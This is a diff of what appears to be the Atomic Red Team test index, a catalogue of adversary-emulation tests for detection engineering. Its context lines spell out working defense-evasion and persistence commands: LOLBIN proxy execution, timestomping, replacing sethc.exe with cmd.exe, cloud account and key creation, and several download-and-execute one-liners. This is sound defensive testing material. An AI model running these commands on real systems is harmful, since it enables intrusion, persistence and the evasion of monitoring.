@@ -40146,15 +40146,15 @@ defense-evasion:
- description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe
must be provided
-'
+ '
prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft
Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'write-host "Install Microsoft Word or provide correct
path."
-'
+ '
executor:
name: command_prompt
elevation_required: false
@@ -40166,7 +40166,7 @@ defense-evasion:
description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
.Net assembly that launches calc.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40188,15 +40188,15 @@ defense-evasion:
prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'write-host ".Net must be installed for this test to work
correctly."
-'
+ '
executor:
command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
-'
+ '
name: powershell
elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
@@ -40204,7 +40204,7 @@ defense-evasion:
description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
running a .Net assembly that launches calc.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40233,7 +40233,7 @@ defense-evasion:
get_prereq_command: 'write-host "you need to rename workflow complier before
you run this test"
-'
+ '
executor:
command: "#{renamed_binary} #{xml_payload} output.txt\n"
name: powershell
@@ -40276,7 +40276,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
-ModulePath #{module_path}'
@@ -40286,7 +40286,7 @@ defense-evasion:
description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40303,17 +40303,17 @@ defense-evasion:
- description: txt file must exist on disk at specified location (#{txt_payload})
prereq_command: 'if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
- description: DiskShadow.exe must exist on disk at specified location (#{dspath})
prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
-'
+ '
executor:
command: "#{dspath} -S #{txt_payload} \n"
name: powershell
@@ -40333,17 +40333,17 @@ defense-evasion:
dependencies:
- description: 'DLL to load must exist on disk as specified location (#{arbitrary_dll})
-'
+ '
prereq_command: 'if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
executor:
command: 'wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
-'
+ '
cleanup_command: taskkill /f /im calculator.exe > nul 2>&1
name: command_prompt
T1216:
@@ -40408,14 +40408,14 @@ defense-evasion:
executor:
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
-'
+ '
name: command_prompt
- name: manage-bde.wsf Signed Script Command Execution
auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -40429,7 +40429,7 @@ defense-evasion:
cscript %windir%\System32\manage-bde.wsf
cleanup_command: 'set comspec=%windir%\System32\cmd.exe
-'
+ '
name: command_prompt
T1027.002:
technique:
@@ -40504,10 +40504,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
- name: Binary packed by UPX, with modified headers (linux)
auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
@@ -40526,10 +40526,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
- name: Binary simply packed by UPX
auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
@@ -40546,10 +40546,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
- name: Binary packed by UPX, with modified headers
auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
@@ -40568,10 +40568,10 @@ defense-evasion:
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-'
+ '
cleanup_command: 'rm /tmp/packed_bin
-'
+ '
name: sh
T1036.006:
technique:
@@ -40625,7 +40625,7 @@ defense-evasion:
auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
description: 'Space After Filename
-'
+ '
supported_platforms:
- macos
executor:
@@ -40637,7 +40637,7 @@ defense-evasion:
auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea
description: 'Space after filename.
-'
+ '
supported_platforms:
- macos
- linux
@@ -40859,7 +40859,7 @@ defense-evasion:
auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
description: 'Common Sudo enumeration methods.
-'
+ '
supported_platforms:
- macos
- linux
@@ -40873,7 +40873,7 @@ defense-evasion:
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -40888,7 +40888,7 @@ defense-evasion:
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -41002,7 +41002,7 @@ defense-evasion:
| grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
Environment detected"; fi;
-'
+ '
- name: Detect Virtualization Environment (Windows)
auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -41012,7 +41012,7 @@ defense-evasion:
This is meant to find the result of Not supported, which is the result if
run in a virtual machine
-'
+ '
supported_platforms:
- windows
executor:
@@ -41029,7 +41029,7 @@ defense-evasion:
the system. If it''s a virtual machine, one of the device manufacturer will
be a Virtualization Software.
-'
+ '
supported_platforms:
- macos
executor:
@@ -41039,7 +41039,7 @@ defense-evasion:
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
-'
+ '
- name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78
description: "Windows Management Instrumentation(WMI) objects contain system
@@ -41294,7 +41294,7 @@ defense-evasion:
executor:
command: 'start #{docx_file}
-'
+ '
name: command_prompt
T1055.003:
technique:
@@ -41565,7 +41565,7 @@ defense-evasion:
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
description: 'Stomps on the access timestamp of a file
-'
+ '
supported_platforms:
- linux
- macos
@@ -41577,13 +41577,13 @@ defense-evasion:
executor:
command: 'touch -a -t 197001010000.00 #{target_filename}
-'
+ '
name: sh
- name: Set a file's modification timestamp
auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
description: 'Stomps on the modification timestamp of a file
-'
+ '
supported_platforms:
- linux
- macos
@@ -41595,7 +41595,7 @@ defense-evasion:
executor:
command: 'touch -m -t 197001010000.00 #{target_filename}
-'
+ '
name: sh
- name: Set a file's creation timestamp
auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -41641,7 +41641,7 @@ defense-evasion:
executor:
command: 'touch -acmr #{reference_file_path} #{target_file_path}
-'
+ '
name: sh
- name: Windows - Modify file creation timestamp with PowerShell
auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
@@ -41664,10 +41664,10 @@ defense-evasion:
- description: 'A file must exist at the path (#{file_path}) to change the creation
time on
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -41675,10 +41675,10 @@ defense-evasion:
command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}"
}
-'
+ '
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - Modify file last modified timestamp with PowerShell
auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
@@ -41701,10 +41701,10 @@ defense-evasion:
- description: 'A file must exist at the path (#{file_path}) to change the modified
time on
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -41712,10 +41712,10 @@ defense-evasion:
command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}"
}
-'
+ '
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - Modify file last access timestamp with PowerShell
auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
@@ -41738,10 +41738,10 @@ defense-evasion:
- description: 'A file must exist at the path (#{file_path}) to change the last
access time on
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -41749,10 +41749,10 @@ defense-evasion:
command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}"
}
-'
+ '
cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - Timestomp a File
auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
@@ -41770,25 +41770,25 @@ defense-evasion:
dependencies:
- description: 'timestomp.ps1 must be present in #{file_path}.
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
-OutFile "#{file_path}\timestomp.ps1"
-'
+ '
- description: 'kxwn.lock must be present in #{file_path}.
-'
+ '
prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File
-'
+ '
executor:
command: |
import-module #{file_path}\timestomp.ps1
@@ -42764,10 +42764,10 @@ defense-evasion:
- description: 'Test requrires a file to take ownership of to be located at
(#{file_folder_to_own})
-'
+ '
prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: |
mkdir #{file_folder_to_own}
echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt
@@ -42775,7 +42775,7 @@ defense-evasion:
executor:
command: 'takeown.exe /f #{file_folder_to_own} /r
-'
+ '
name: command_prompt
- name: cacls - Grant permission to specified user or group recursively
auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485
@@ -42798,10 +42798,10 @@ defense-evasion:
dependencies:
- description: 'Test requrires a file to modify to be located at (#{file_or_folder})
-'
+ '
prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt
@@ -42809,7 +42809,7 @@ defense-evasion:
executor:
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
-'
+ '
name: command_prompt
- name: attrib - Remove read-only attribute
auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0
@@ -42827,10 +42827,10 @@ defense-evasion:
dependencies:
- description: 'Test requrires a file to modify to be located at (#{file_or_folder})
-'
+ '
prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
@@ -42840,7 +42840,7 @@ defense-evasion:
executor:
command: 'attrib.exe -r #{file_or_folder}\*.* /s
-'
+ '
name: command_prompt
- name: attrib - hide file
auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c
@@ -42863,7 +42863,7 @@ defense-evasion:
attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1
-'
+ '
name: command_prompt
- name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style
auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
@@ -42888,18 +42888,18 @@ defense-evasion:
- description: 'Backup of original folder permissions should exist (for use
in cleanup commands)
-'
+ '
prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
-'
+ '
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1220:
@@ -43013,37 +43013,37 @@ defense-evasion:
dependencies:
- description: 'XML file must exist on disk at specified location (#{xmlfile})
-'
+ '
prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
- description: 'XSL file must exist on disk at specified location (#{xslfile})
-'
+ '
prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
- description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe})
-'
+ '
prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe"
-OutFile "#{msxsl_exe}"
-'
+ '
executor:
command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n"
cleanup_command: 'del #{msxsl_exe} >nul 2>&1
-'
+ '
name: command_prompt
- name: MSXSL Bypass using remote files
auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
@@ -43071,26 +43071,26 @@ defense-evasion:
dependencies:
- description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe})
-'
+ '
prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe"
-OutFile "#{msxsl_exe}"
-'
+ '
executor:
command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n"
cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1
-'
+ '
name: command_prompt
- name: WMIC bypass using local XSL file
auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
description: 'Executes the code specified within a XSL script using a local
payload.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -43106,17 +43106,17 @@ defense-evasion:
dependencies:
- description: 'XSL file must exist on disk at specified location (#{local_xsl_file})
-'
+ '
prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
executor:
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
-'
+ '
name: command_prompt
- name: WMIC bypass using remote XSL file
auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
@@ -43124,7 +43124,7 @@ defense-evasion:
payload. Open Calculator.exe when test successfully executed, while AV turned
off.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -43139,7 +43139,7 @@ defense-evasion:
executor:
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
-'
+ '
name: command_prompt
persistence:
T1546.008:
@@ -43233,7 +43233,7 @@ persistence:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
-'
+ '
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -43241,7 +43241,7 @@ persistence:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
-'
+ '
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -43275,7 +43275,7 @@ persistence:
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
-'
+ '
supported_platforms:
- windows
executor:
@@ -43286,7 +43286,7 @@ persistence:
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-'
+ '
name: command_prompt
elevation_required: true
T1098:
@@ -43363,7 +43363,7 @@ persistence:
auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
description: 'Manipulate Admin Account Name
-'
+ '
supported_platforms:
- windows
executor:
@@ -43429,7 +43429,7 @@ persistence:
dependencies:
- description: 'PS Module ActiveDirectory
-'
+ '
prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop
| Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n"
get_prereq_command: |
@@ -43452,14 +43452,14 @@ persistence:
cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
| Remove-ADUser -Confirm:$False
-'
+ '
name: powershell
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -43471,14 +43471,14 @@ persistence:
- description: 'Check if the user exists, we can only add a user to a group
if the user exists.
-'
+ '
prereq_command: 'aws iam list-users | grep #{username}
-'
+ '
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic test
-'
+ '
executor:
command: |
aws iam create-group --group-name #{username}
@@ -43520,14 +43520,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -43589,14 +43589,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -43663,14 +43663,14 @@ persistence:
dependencies:
- description: 'Az.Resources module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name Az.Resources -Force
-'
+ '
executor:
command: |
Import-Module -Name Az.Resources
@@ -43743,14 +43743,14 @@ persistence:
dependencies:
- description: 'Az.Resources module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name Az.Resources -Force
-'
+ '
executor:
command: "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString
-String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
@@ -43819,14 +43819,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String
\"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
@@ -44068,7 +44068,7 @@ persistence:
command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
-'
+ '
T1098.001:
technique:
object_marking_refs:
@@ -44175,14 +44175,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -44255,14 +44255,14 @@ persistence:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
Import-Module -Name AzureAD
@@ -44306,7 +44306,7 @@ persistence:
description: 'Adversaries create their own new access and secret keys to programatically
interact with AWS environment, which is already compromised
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -44317,14 +44317,14 @@ persistence:
dependencies:
- description: 'Check if the user exists.
-'
+ '
prereq_command: 'aws iam list-users | grep #{username}
-'
+ '
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic
-'
+ '
executor:
command: |
aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
@@ -44519,11 +44519,11 @@ persistence:
- description: 'Reg files must exist on disk at specified locations (#{registry_file}
and #{registry_cleanup_file})
-'
+ '
prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -44532,11 +44532,11 @@ persistence:
- description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
T1546.010x86.dll)
-'
+ '
prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -44544,10 +44544,10 @@ persistence:
executor:
command: 'reg.exe import #{registry_file}
-'
+ '
cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1546.011:
@@ -44655,31 +44655,31 @@ persistence:
- description: 'Shim database file must exist on disk at specified location
(#{file_path})
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
- description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
-'
+ '
prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
executor:
command: 'sdbinst.exe #{file_path}
-'
+ '
cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: New shim database files created in the default shim database directory
@@ -44786,7 +44786,7 @@ persistence:
description: 'This test submits a command to be run in the future by the `at`
daemon.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -44802,30 +44802,30 @@ persistence:
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
-'
+ '
prereq_command: 'which at && which atd
-'
+ '
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
-'
+ '
- description: 'The `atd` daemon must be running
-'
+ '
prereq_command: 'systemctl status atd || service atd status
-'
+ '
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
-'
+ '
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}
-'
+ '
T1053.002:
technique:
object_marking_refs:
@@ -44922,7 +44922,7 @@ persistence:
elevation_required: false
command: 'at 13:20 /interactive cmd
-'
+ '
T1547.002:
technique:
object_marking_refs:
@@ -45106,10 +45106,10 @@ persistence:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
-'
+ '
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bitsadmin Download (PowerShell)
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -45133,10 +45133,10 @@ persistence:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
-'
+ '
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
-'
+ '
name: powershell
- name: Persist, Download, & Execute
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -45174,7 +45174,7 @@ persistence:
bitsadmin.exe /complete #{bits_job_name}
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bits download using desktopimgdownldr.exe (cmd)
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -45206,10 +45206,10 @@ persistence:
command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
/eventName:desktopimgdownldr
-'
+ '
cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
T1547:
technique:
@@ -45305,7 +45305,7 @@ persistence:
auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
description: 'Install a driver via pnputil.exe lolbin
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -45316,7 +45316,7 @@ persistence:
executor:
command: 'pnputil.exe /add-driver "#{driver_inf}"
-'
+ '
name: command_prompt
T1037:
technique:
@@ -45552,7 +45552,7 @@ persistence:
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
-'
+ '
supported_platforms:
- linux
- windows
@@ -45572,7 +45572,7 @@ persistence:
sent from a compromised host. This will install one (of many) available VPNS
in the Edge add-on store.
-'
+ '
supported_platforms:
- windows
- macos
@@ -45692,7 +45692,7 @@ persistence:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -45737,7 +45737,7 @@ persistence:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -45775,7 +45775,7 @@ persistence:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
